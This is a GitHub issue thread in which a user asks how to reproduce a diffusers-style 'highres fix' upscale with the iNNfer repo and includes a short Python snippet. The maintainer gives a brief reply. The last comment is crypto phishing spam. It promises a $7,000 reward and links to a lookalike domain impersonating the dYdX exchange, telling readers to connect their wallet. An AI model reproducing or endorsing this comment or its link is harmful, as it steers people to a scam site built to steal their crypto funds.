### ISSUE TITLE
How to do the equivalent in this repo?

### ISSUE THREAD

**Issue by alexblattner** [victorca25/iNNfer#5]
Hello @victorca25, I'd like to replicate highres fix, but am unsure how it works exactly. I mainly use diffusers so I must use your repo to replicate highres fix.

If I wanted to use 4x-UltraSharp, upscale it by 1.5, with 25 highres steps and a denoising of 0.4. What should the code look like?

this is how the default code looks like:
```
import torch
from PIL import Image
import numpy as np
from run import load_model, run

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

model = load_model('upscaler/4x-UltraSharp.pth', device)

path_to_image = 'img11.png'
image = Image.open(path_to_image).convert('RGB')
 
sr_image =run(model,image)
pil_image = Image.fromarray(sr_image)
pil_image.save('u3.png')
```

I hope you see my issue soon and thanks in advance for your time.

**Comment by victorca25** [comment]
Hello! Did you find a solution to your question? 

The original idea with this repo was to run a model with many images in a directory directly from the command line, but making a script like the one you want to use for the Hires Fix with diffusers would be very simple, since it happens on the pixel-space.

**Comment by alexblattner** [comment]
@victorca25 I haven't. I just upscale by 4 then shrink it as I need. I don't know enough about "since it happens on the pixel-space."

**Comment by codelou** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol
